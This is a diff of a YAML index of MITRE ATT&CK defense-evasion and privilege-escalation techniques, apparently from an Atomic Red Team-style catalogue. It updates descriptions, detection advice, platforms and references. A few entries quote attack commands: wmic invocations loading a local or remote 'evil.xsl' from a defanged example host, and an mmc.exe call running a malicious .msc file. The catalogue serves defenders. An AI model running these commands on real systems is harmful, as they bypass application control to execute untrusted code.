-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13682,29 +13926,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13737,7 +14025,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -13765,48 +14053,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13815,6 +14066,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -13823,20 +14077,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -13893,6 +14178,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13903,13 +14189,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -13968,11 +14253,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -14012,8 +14296,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -14021,13 +14307,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -14058,9 +14344,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -14121,7 +14404,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14143,11 +14426,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14214,8 +14496,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14233,7 +14515,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14336,12 +14617,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14354,6 +14634,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14390,17 +14671,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14446,9 +14727,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14486,7 +14764,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14505,7 +14783,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14536,7 +14813,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14560,12 +14837,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14649,7 +14924,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14671,7 +14945,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -14705,12 +14979,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14762,9 +15034,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -14833,7 +15104,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -14880,7 +15150,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -14893,12 +15163,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -14977,7 +15248,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14999,7 +15270,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -15042,7 +15312,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15066,8 +15336,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -15115,7 +15383,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15153,8 +15421,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15203,7 +15469,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15255,29 +15521,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
